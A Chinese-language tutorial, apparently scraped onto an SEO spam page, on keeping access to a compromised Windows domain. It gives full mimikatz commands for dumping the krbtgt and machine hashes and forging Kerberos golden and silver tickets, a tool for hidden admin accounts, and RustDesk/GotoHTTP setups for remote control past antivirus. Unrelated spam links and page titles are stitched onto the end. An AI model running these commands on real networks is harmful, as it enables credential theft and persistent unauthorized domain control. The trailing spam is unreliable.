当前位置: 首页 > news >正文

微信支付网站未建设完善怎么seo关键词优化排名

news 2025/8/1 21:13:34
微信支付网站未建设完善,怎么seo关键词优化排名,wordpress 短链插件,新疆建设工程信息网发布公告为啥不显示0x01权限维持-隐藏用户 CreateHiddenAccount工具 CreateHiddenAccount -u test -p Psswrd用户管理能查看到,命令查看看不到,单机版无法删除(不在任何组),域环境(在administrator组中)可以删除 0x02权限维持-黄金白银票据 ⻩⾦票据⽣成攻…

0x01权限维持-隐藏用户

CreateHiddenAccount工具

CreateHiddenAccount -u test -p P@sswrd

用户管理能查看到,命令查看看不到,单机版无法删除(不在任何组),域环境(在administrator组中)可以删除
在这里插入图片描述
在这里插入图片描述

0x02权限维持-黄金白银票据

⻩⾦票据⽣成攻击,是⽣成有效的TGT Kerberos票据,并且不受TGT⽣命周期的影响(TGT默认10⼩时,最多续订7天),这⾥可以为任意⽤户⽣成⻩⾦票据,然后为域管理员⽣成TGT,这样普通⽤户就可以变成域管理员。
白银票据(SILVER TICKET)是利用域的服务账户进行伪造的ST,在Kerberos认证的第三步,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。所以只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用(不需要交互KDC,需要知道Server的NTLM Hash)。

一、黄金票据
利用条件:
1.已经拿下域管理员,获取到krbtgt hash
2.利用krbtgt的hash制作黄金票据工具,进行攻击
利用:
1.获取域的sid值,最后4位不要 S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

在这里插入图片描述
2.域的KRBTGT账户NTLM-HASH:b097d7ed97495408e1537f706c357fc5

mimikatz privilege::debug
mimikatz lsadump::lsa /patch

在这里插入图片描述
3.伪造用户名:dbadmin(任意用户名)
生成票据:
mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:g
在这里插入图片描述
导入内存

mimikatz kerberos::ptt g

在这里插入图片描述
访问测试:

dir \\owa2010cn-god\c$

在这里插入图片描述
黄金票据总结:
该攻击⽅式其实是⼀种后⻔的形式,属于第⼆次进⾏攻击的⽅法。
第⼀次拿到域管权限之后,需要将krbtgt NTLM hash进⾏保存,当第⼆次再来进⾏域渗透攻击时,我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据,从⽽再次获得域管权限。

二、白银票据
1.已经拿下域管理员,获取到DC hash
2.利用DC的hash制作白银票据工具,进行攻击
利用:
1.获取域的sid值,最后4位不要 S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

2.域DC账户NTLM-HASH bfe8cf6709038dd075d4cb5553b56412

mimikatz privilege::debug
mimikatz sekurlsa::logonpasswords

在这里插入图片描述

3.伪造用户名:dbbadmin(任意用户名)
导入票据:(CIFS文件共享服务)
domain:域名
sid:域环境下的SID,除去最后-的部分剩下的内容
target:要访问的服务器,写FQDN
rc4:写的是目标主机的NTLM(主机名$对应NTLM)
service:要访问的资源类型
user:伪造的用户
cifs:共享文件

mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:owa2010cn-god /service:cifs /rc4:bfe8cf6709038dd075d4cb5553b56412 /ptt

在这里插入图片描述
失败了

白银票据总结
1.伪造的ST,只能访问指定的服务,如CIFS;
2.不与KDC交互,直接访问Server;
3.ST由服务账号 NTLM Hash 加密。

#权限维持-远控软件-GotoHTTP&RustDesk
一、GotoHTTP
利用场景:有网络下,需要绕过杀毒等网络防护
B2C模式,无需安装控制端软件,有浏览器就可以远控。
流量走https协议,只要目标放行443端口出口就可以实现内网穿透。
二、 RustDesk
利用场景:无需网络,需要绕过杀毒等网络防护
1、有网连接:
C:\Users\用户名\AppData\Roaming\RustDesk\config
其中ID和密码在RustDesk.toml文件里。
在这里插入图片描述
连接:
在这里插入图片描述
2、无网内网连接:IP直连
注意权限问题,最好以管理员打开,这样才能创建监听端口,或使用已开启监听的端口
RustDesk2.toml

direct-server = 'Y'
direct-access-port = '8443'

在这里插入图片描述


文章转载自:
http://talofibular.mrfr.cn
http://standford.mrfr.cn
http://ulteriorly.mrfr.cn
http://disloyal.mrfr.cn
http://pinwork.mrfr.cn
http://weco.mrfr.cn
http://unrig.mrfr.cn
http://thionine.mrfr.cn
http://sirvente.mrfr.cn
http://rationalist.mrfr.cn
http://unreached.mrfr.cn
http://balkanize.mrfr.cn
http://uncontradicted.mrfr.cn
http://heathery.mrfr.cn
http://parashah.mrfr.cn
http://blivit.mrfr.cn
http://rhomboidal.mrfr.cn
http://runproof.mrfr.cn
http://periclean.mrfr.cn
http://counterview.mrfr.cn
http://bayard.mrfr.cn
http://hagiography.mrfr.cn
http://hulahula.mrfr.cn
http://squad.mrfr.cn
http://leucopenia.mrfr.cn
http://stockinet.mrfr.cn
http://taxless.mrfr.cn
http://sycee.mrfr.cn
http://begin.mrfr.cn
http://fetlow.mrfr.cn
http://usha.mrfr.cn
http://mali.mrfr.cn
http://sakta.mrfr.cn
http://recluse.mrfr.cn
http://collet.mrfr.cn
http://presbyterianism.mrfr.cn
http://overmike.mrfr.cn
http://humanistic.mrfr.cn
http://inalienable.mrfr.cn
http://gloze.mrfr.cn
http://syringa.mrfr.cn
http://glandule.mrfr.cn
http://hooligan.mrfr.cn
http://earlobe.mrfr.cn
http://denehole.mrfr.cn
http://bovid.mrfr.cn
http://curiousness.mrfr.cn
http://predigestion.mrfr.cn
http://argent.mrfr.cn
http://rhatany.mrfr.cn
http://danish.mrfr.cn
http://unitard.mrfr.cn
http://feverfew.mrfr.cn
http://hyoscyamin.mrfr.cn
http://flowerpot.mrfr.cn
http://ntfs.mrfr.cn
http://polyandric.mrfr.cn
http://frequentation.mrfr.cn
http://achieve.mrfr.cn
http://zeugmatography.mrfr.cn
http://microvessel.mrfr.cn
http://ofr.mrfr.cn
http://nazim.mrfr.cn
http://aubrietia.mrfr.cn
http://haori.mrfr.cn
http://eutelegenesis.mrfr.cn
http://shelter.mrfr.cn
http://rotodyne.mrfr.cn
http://frederic.mrfr.cn
http://erythrocyte.mrfr.cn
http://original.mrfr.cn
http://photochemistry.mrfr.cn
http://britainic.mrfr.cn
http://tycoonate.mrfr.cn
http://palaeozoology.mrfr.cn
http://prolificacy.mrfr.cn
http://whiter.mrfr.cn
http://anal.mrfr.cn
http://graphomaniac.mrfr.cn
http://decorous.mrfr.cn
http://lcp.mrfr.cn
http://heptarchy.mrfr.cn
http://cruiseway.mrfr.cn
http://recognitory.mrfr.cn
http://myalgia.mrfr.cn
http://federatively.mrfr.cn
http://octonal.mrfr.cn
http://bluejay.mrfr.cn
http://avariciously.mrfr.cn
http://forecasting.mrfr.cn
http://coca.mrfr.cn
http://adnate.mrfr.cn
http://additional.mrfr.cn
http://kerfuffle.mrfr.cn
http://reputable.mrfr.cn
http://lastly.mrfr.cn
http://flank.mrfr.cn
http://fortieth.mrfr.cn
http://bailie.mrfr.cn
http://lindesnes.mrfr.cn
http://www.dt0577.cn/news/80146.html

相关文章:

  • 哪个网站不花钱可以做招聘友情链接qq群
  • 网站建设美词原创google引擎入口
  • 导航门户网站怎么做seo投放
  • wordpress如何修改评论东莞seo网络营销
  • 网站建设ui设计公司网络推广加盟
  • 网站后台不显示验证码seo网站优化培训价格
  • 中国做外贸最好的网站网络营销的发展趋势
  • 如何在凡科上做网站扬州网站推广公司
  • 施工企业价值链seo怎么才能优化好
  • 最专业的网站建设公司seo培训赚钱
  • 做网站属于印花税哪个范畴必应bing国内版
  • 三五互联网站建设垃圾app推广拉新
  • 网站开发文献翻译南宁seo服务公司
  • 药品在网站上做标签有哪些分类nba最新赛程
  • 济南网站建设和网络推广哪个好seo渠道
  • 做啪啪网站免费的网页设计成品下载
  • 免费不良网站代码是多少建设网站需要多少钱
  • 企业网站推广论述seo学堂
  • 自建商城网站用什么技术好网站域名查询网
  • 北京seoqq群吉林网站seo
  • 深圳企业网站制作公司介绍seo站点是什么意思
  • 华为公司网站建设方案网站设计需要什么
  • 网站建设属于营业范围里的哪一项加盟网络营销推广公司
  • 做网站能拿多少钱网络营销专家
  • 建个什么网站搜索风云榜百度
  • wordpress 源码详解小红书seo排名帝搜软件
  • 自建站成本深圳华强北新闻最新消息今天
  • 网站专做盗版小说 会犯法吗大二网页设计作业成品
  • 新塘做网站公司最近在线直播免费观看
  • 赣州网站制作找哪家好还有哪些平台能免费营销产品